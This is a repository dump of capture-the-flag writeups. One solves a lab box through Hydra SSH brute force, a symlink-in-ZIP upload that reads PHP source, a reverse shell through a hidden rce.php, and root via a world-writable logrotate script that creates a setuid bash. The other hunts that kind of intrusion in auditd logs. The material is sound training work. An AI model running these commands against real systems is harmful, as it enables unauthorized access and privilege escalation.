13 | sudo openvpn prolab-user_1.ovpn
14 | ```
15 |
16 | 
17 |
18 |
19 | ---
20 |
21 | ## ENUMERATION
22 |
23 | - NMAP SCAN
24 |
25 | ```bash
26 | nmap -sC -sV -p- --min-rate 5000 10.20.17.70
27 | ```
28 |
29 | 
30 |
31 | The initial Nmap scan reveals two open ports: FTP on 21 and SSH on 22. The `ftp-anon` script output shows that anonymous FTP login is allowed, so we continue enumeration there.
32 |
33 | - FTP LOGIN
34 |
35 | ```bash
36 | ftp 10.20.17.70
37 | ```
38 |
39 | 
40 |
41 | Only one .txt file exists on the FTP server (system_log.txt). To read it, we first switch to `binary` mode and download the file to our machine with `get`.
42 |
43 | ```bash
44 | ftp> binary
45 | ftp> get system_log.txt
46 | ftp> exit
47 | ```
48 |
49 | 
50 |
51 | The file gives us a hint: the probable username is `user1`, and since SSH is open it is the natural target for a brute-force attack. We can move on to the next stage.
52 |
53 | ---
54 |
55 | ## EXPLOITATION & INITIAL FOOTHOLD
56 |
57 | - SSH BRUTE-FORCE
58 |
59 | ```bash
60 | hydra -l user1 -P rockyou.txt 10.20.17.70 ssh
61 | ```
62 |
63 | 
64 |
65 | Hydra soon recovers the user’s password, and the SSH credentials give us an initial foothold on the machine.
66 |
67 | 
68 |
69 | ---
70 |
71 | ## PRIVILEGE ESCALATION ( HORIZONTAL )
72 |
73 | The first flag is located at `/home/user2/user.txt`.
74 |
75 | So `user2` is the account we need to move to. First, let’s see which users exist:
76 |
77 | ```bash
78 | cat /etc/passwd
79 | ```
80 |
81 | 
82 |
83 | Besides `user2`, the presence of the `www-data` user suggests that a web application is running on the machine.
84 |
85 | We list the listening sockets to find the web server’s port, and check `/var/www/html` for the web root.
86 |
87 | ```bash
88 | netstat -tulpn
89 | ```
90 |
91 | 
92 |
93 | We don’t have permission to read the webapp folder. Port 9090 is a common alternative HTTP port, and the listener is bound to the loopback address only (`127.0.0.1:9090`), so it is reachable from the target itself but not from our machine. We therefore forward the port over SSH.
94 |
95 | ```bash
96 | ssh -L 127.0.0.1:4444:127.0.0.1:9090 user1@10.20.17.70
97 | ```
98 |
99 | 
100 |
101 | Explaining the command:
102 |
103 | - `ssh -L` - requests local port forwarding: connections to a port on our side are tunnelled through the SSH session.
104 | - `127.0.0.1:4444` - the local bind address and port (the address part is optional; `-L 4444:127.0.0.1:9090` binds to localhost by default).
105 | - `127.0.0.1:9090` - the destination as seen from the remote machine, i.e. the loopback web server on the target.
106 | - `user1@10.20.17.70` - the SSH credentials recovered earlier.
107 |
108 | Once the set up is complete, we can open a web browser and access the web server at `http://127.0.0.1:4444` .
109 |
110 | 
111 |
112 | It appears that the Apache web server is running on the machine, with directory listing enabled. Let’s take a closer look at the script files.
113 |
114 | 
115 |
116 | `/uploads`
117 |
118 | Directory is empty.
119 |
120 | 
121 |
122 | `upload.php`
123 |
124 | Another hint suggests that we should look into the source code of `upload.php`. Requesting it in the browser only executes the script, so nothing useful is revealed yet.
125 |
126 | 
127 |
128 | 
129 |
130 | `doc.php`
131 |
132 | This PHP script uploads files to the remote machine. Let’s take advantage of it.
133 |
134 | To understand how it behaves, we upload an arbitrary file and observe that only ZIP files are accepted.
135 |
136 | 
137 |
138 | 
139 |
140 | There are many ways to abuse ZIP uploads, but our goal is to read `upload.php`. Since the server extracts the archive, a ZIP that stores a symbolic link leaves that link on disk inside the web root; and because the link is named `zipfile`, with no `.php` extension, Apache serves the linked file as plain text instead of executing it.
141 |
142 | - Create and store symlinks in ZIP files:
143 |
144 | ```bash
145 | ln -s /var/www/html/webapp/upload.php zipfile # Symlink pointing at the exact location of upload.php.
146 | zip -y zipfile.zip zipfile                     # -y stores the symlink itself instead of the file it points to.
147 | ```
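To see what `zip -y` actually stores, and what the upload handler should have checked before extracting, here is an added example (not code from the writeup or the challenge): it builds an archive whose only entry is a symlink, then runs a validator that refuses archives containing symlinks or path-traversal names. Standard library only; the link target is the path used above, the other file names are made up.

```python
"""Added example: symlink-in-ZIP artifact and a pre-extraction validator."""
import io
import posixpath
import stat
import zipfile


def build_symlink_zip(link_name, target):
    """ZIP whose only entry is a symlink link_name -> target (what `zip -y` stores)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(link_name)
        info.create_system = 3                              # Unix: external_attr carries st_mode
        info.external_attr = (stat.S_IFLNK | 0o777) << 16   # lrwxrwxrwx
        zf.writestr(info, target)                           # the link target is the entry's data
    return buf.getvalue()


def build_plain_zip(name, data):
    """Ordinary archive with one regular file, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def is_symlink(info):
    """True when the entry's Unix mode bits say it is a symbolic link."""
    return stat.S_ISLNK(info.external_attr >> 16)


def unsafe_entries(zip_bytes):
    """Reasons the archive must not be extracted as-is; an empty list means it passed."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if is_symlink(info):
                target = zf.read(info).decode("utf-8", "replace")
                problems.append(f"{name}: symlink -> {target}")
            norm = posixpath.normpath(name)
            if posixpath.isabs(name) or norm == ".." or norm.startswith("../") or "\\" in name:
                problems.append(f"{name}: path traversal")
    return problems


if __name__ == "__main__":
    evil = build_symlink_zip("zipfile", "/var/www/html/webapp/upload.php")
    print(unsafe_entries(evil))                                  # ['zipfile: symlink -> /var/www/html/webapp/upload.php']
    print(unsafe_entries(build_plain_zip("doc.txt", b"hello")))  # []
```

Rejecting the archive is the fix on the upload side; the complementary server-side hardening is `Options -FollowSymLinks` (or `SymLinksIfOwnerMatch`) on the upload directory, so that a link which does get extracted is not followed by Apache.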
148 |
149 | 
150 |
151 | 
152 |
153 | 
154 |
155 | 
156 |
157 | The upload is extracted into a new folder under the `/uploads` directory.
158 |
159 | 
160 |
161 | 
162 |
163 | The symlink was extracted from the ZIP; requesting it makes Apache follow the link, and we can now read the source code of `upload.php`.
164 |
165 | 
166 |
167 | The script contains a message directing us to access the `/.pro_hidden_connectivity` folder.
168 |
169 | 
170 |
171 | 
172 |
173 | This directory contains another PHP script, `rce.php`, which executes commands on the server (Remote Code Execution).
174 |
175 | 
176 |
177 | 
178 |
179 | Before we proceed, we start a netcat listener on our machine.
180 |
181 | 
182 |
183 | Then we submit a suitable reverse shell one-liner.
184 |
185 | 
186 |
187 | 
188 |
189 | The command fails to execute.
190 | The reason is visible in the page’s script: it calls `window.btoa`, the browser’s Base64 encoder, so the backend expects the command to arrive Base64-encoded.
191 |
192 | 
193 |
194 | Let’s Base64-encode the command and submit it again. This time we get a reverse shell as `user2` and can read the first flag.
195 |
196 | 
197 |
198 | 
199 |
200 |
201 |
202 | 
203 |
204 | ---
205 |
206 | # PRIVILEGE ESCALATION (ROOT)
207 |
208 | With a shell as `user2`, we run `linpeas.sh` to look for privilege escalation vectors.
209 |
210 | It reports a logrotate job in `/etc/cron.d`:
211 |
212 | 
213 |
214 | It also lists a writable path that could be used for escalation.
215 |
216 | 
217 |
218 | Looking through the logrotate configuration files, we find an interesting one named “blackmirror”.
219 |
220 | 
221 |
222 | Its configuration runs a script after rotation, and the path of that script is what makes it vulnerable:
223 |
224 | ```bash
225 | /usr/local/bin/postrotate.sh
226 | ```
227 |
228 | 
229 |
230 | Since `postrotate.sh` is world-writable (mode `777`) and logrotate is executed by root from cron, anything we write into it runs as root on the next rotation. Here’s how:
231 |
232 | - Overwrite `postrotate.sh` with a three-line payload that creates a setuid shell:
233 |
234 | Explanation of the malicious script:
235 |
236 | - `#!/bin/bash`: Specifies that the script should run with Bash.
237 | - `cp /bin/bash /tmp/bash`: Copies the system’s `bash` executable to `/tmp`; because root runs the script, the copy is owned by root.
238 | - `chmod +s /tmp/bash`: Sets the setuid bit, so the copy runs with the privileges of its owner (root). Once the cron job has fired, run it as `/tmp/bash -p`; without `-p`, bash drops the elevated effective UID at startup.
239 |
240 | Now we are root!!!
241 |
242 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/ctf2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/ctf2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 01.jpg
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 02.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 03.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 04.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 05.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 10.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 12.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 13.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 14.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 15.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 16.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 17.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 18.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 19.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 20.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 21.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 21.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 22.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 22.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 23.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 24.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 24.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 25.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 25.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 26.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 26.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 27.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 27.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 28.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 28.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 29.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 29.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 30.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 30.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 31.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 31.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 32.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 32.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 33.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 33.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/imagee.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/imagee.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/README.md:
--------------------------------------------------------------------------------
1 | **C7 - Root Reaper Quest**
2 |
3 | *Shinigami-like powers have been used to elevate privileges, leaving traces in the logs with cryptic references to Bleach. Your goal: identify the binary and PID responsible for gaining root. Will you find the key hidden in the shadows? (Write only PID)*
4 |
5 | 
6 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.jpg
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/writeup.md:
--------------------------------------------------------------------------------
1 | # C7 - Root Reaper Quest
2 |
3 | In this challenge, we are given a log file and tasked with performing a threat-hunting process. To work with this file, we can use a plain text editor such as Notepad or Visual Studio Code, or the auditd toolset, whose `aureport` utility understands the audit log format and provides the report options used below. You can install it using the command below:
4 |
5 | `sudo apt install auditd`
6 |
7 | Once installed, we can start examining the file. A good starting point is the `--summary` option of `aureport`, which gives an overall understanding of the file:
8 |
9 | 
10 |
11 | From the output, we can see that the account "bankai" was compromised. Our goal is to identify the type of attack that was used to gain initial access. Analyzing the results of the previous command, we notice that within a span of 1 second, there were almost 16 authentication attempts. This is a clear indication of a brute-force attack. The attacker got lucky, as we can see a successful attempt in the output.
12 | Seventeen seconds later, they used the compromised username and password to log in and successfully gained a pseudo-terminal.
13 |
14 | 
15 |
16 | Next, we need to analyze the attacker's actions after gaining access. The first thing that likely comes to mind is that the attacker performed system enumeration. To investigate this, we can use the `--tty` parameter to generate a report on the tty keystrokes.
17 | As shown in the screenshot below, the attacker ran several commands:
18 | - `hostname` to display the system's hostname (the same command can also set the hostname or NIS domain name)
19 | - `whoami` to display the username of the current user, and `ls` to list the contents of the current directory
20 | - `wget` to download the LinPEAS script from their own machine, where it was hosted on port 8000
21 | (*LinPEAS is a script that searches for possible privilege-escalation paths*)
22 |
23 | 
24 |
25 | Now we need to determine the name of the binary that the attacker used to gain root access. This will give us the crucial piece of information required to finish this challenge: the PID responsible for it.
26 |
27 | Following the output from the previous command, we saw that the attacker executed the `lsb_release -a` command, which provides information about the Linux Standard Base (LSB) and distribution-specific details. After that, the attacker ran the `sudo -V` command, which prints the sudo version string, along with the version string of the security policy plugin and any I/O plugins. If the user invoking this command is already root, it will display the arguments passed to configure when sudo was built, and plugins may show more verbose information such as default options.
28 |
29 | Five seconds after determining the sudo version, the attacker downloaded a compressed file to the target machine, which was still hosted on their own server. They ran the `ls` command to confirm the successful download, extracted the contents, navigated to the extracted directory, and ran the `make` command to build it.
30 |
31 | At this point, we can infer that there might be a description file within the extracted directory. Once the build process was complete, the attacker executed a binary called evil.
32 |
33 | To proceed, we can use the `-p` parameter to list all process IDs (PIDs). Since we are particularly interested in anything related to the "evil" binary, we pipe the output through `grep` to filter out unrelated entries.
34 |
35 | The result we get is:
36 |
37 | 
38 |
39 | We can see that the PID of the binary is *829992*, running from the */home/sosuke_aizen/evil/evil* path at 20:27:17. Additionally, we can observe that the attacker executed the evil file using `./evil` and then verified if they had gained root access by running the `whoami` command.
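The two hunts above (spotting the authentication burst in the summary, then finding the PID behind the "evil" binary) can be scripted directly against raw `audit.log` records. The following Python is an added example and is not part of the challenge writeup or the auditd project; the log lines it parses are constructed to mirror what the writeup describes (16 failed logins for "bankai" inside one second, a success shortly after, and an execve of `/home/sosuke_aizen/evil/evil` with PID 829992), and the `syscall=59` filter assumes an x86_64 host.

```python
import re
from collections import defaultdict

# Constructed auditd records (not the challenge's log): 16 failed SSH logins for "bankai"
# from one source inside 0.75 s, one success a second later, and two execve records,
# one of them the "evil" binary with the PID and path quoted in the writeup.
BASE = 1700000000.0
AUTH = ("type=USER_AUTH msg=audit(%.3f:%d): pid=900 uid=0 auid=4294967295 ses=4294967295 "
        "msg='op=PAM:authentication acct=\"bankai\" exe=\"/usr/sbin/sshd\" "
        "hostname=10.10.10.5 addr=10.10.10.5 terminal=ssh res=%s'")
EXEC = ("type=SYSCALL msg=audit(%.3f:%d): arch=c000003e syscall=59 success=yes exit=0 "
        "ppid=1500 pid=%d auid=1001 uid=%d comm=\"%s\" exe=\"%s\" key=\"exec\"")
SAMPLE_LOG = [AUTH % (BASE + 0.1 + i * 0.05, 200 + i, "failed") for i in range(16)]
SAMPLE_LOG.append(AUTH % (BASE + 1.0, 216, "success"))
SAMPLE_LOG.append(EXEC % (BASE + 120.0, 300, 1600, 1001, "whoami", "/usr/bin/whoami"))
SAMPLE_LOG.append(EXEC % (BASE + 900.0, 400, 829992, 1001, "evil", "/home/sosuke_aizen/evil/evil"))

TS_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_record(line):
    """Split one audit line into a dict: 'ts' (float), 'serial' (int) and every key=value
    field, including those nested inside msg='...'. The first occurrence of a key wins."""
    m = TS_RE.search(line)
    if not m:
        return None
    rec = {"ts": float(m.group(1)), "serial": int(m.group(2))}
    for key, quoted, bare in KV_RE.findall(line):
        rec.setdefault(key, quoted if quoted else bare.strip("'"))
    return rec


def auth_bursts(lines, window=1.0, threshold=10):
    """Flag (account, source) pairs with at least `threshold` failed authentications inside
    any `window`-second span, and record the first successful login that followed."""
    failed, success = defaultdict(list), defaultdict(list)
    for line in lines:
        rec = parse_record(line)
        if not rec or rec.get("type") != "USER_AUTH":
            continue
        bucket = failed if rec.get("res") == "failed" else success
        bucket[(rec.get("acct"), rec.get("addr"))].append(rec["ts"])
    findings = []
    for key, times in failed.items():
        times.sort()
        best, j = 0, 0
        for i, t in enumerate(times):          # sliding window over sorted timestamps
            while times[j] < t - window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            later = [s for s in success.get(key, []) if s >= times[0]]
            findings.append({"acct": key[0], "addr": key[1], "failed_in_window": best,
                             "success_at": min(later) if later else None})
    return findings


def find_exec(lines, comm):
    """Return execve SYSCALL records (syscall 59 on x86_64) whose comm matches `comm`,
    the same thing `aureport -p | grep evil` surfaces, with the PID the task asks for."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec and rec.get("type") == "SYSCALL" and rec.get("syscall") == "59" \
                and rec.get("comm") == comm:
            hits.append({"ts": rec["ts"], "pid": int(rec["pid"]),
                         "exe": rec.get("exe"), "uid": rec.get("uid")})
    return hits


if __name__ == "__main__":
    for f in auth_bursts(SAMPLE_LOG):
        print("brute force:", f)
    for h in find_exec(SAMPLE_LOG, "evil"):
        print("exec:", h)
```

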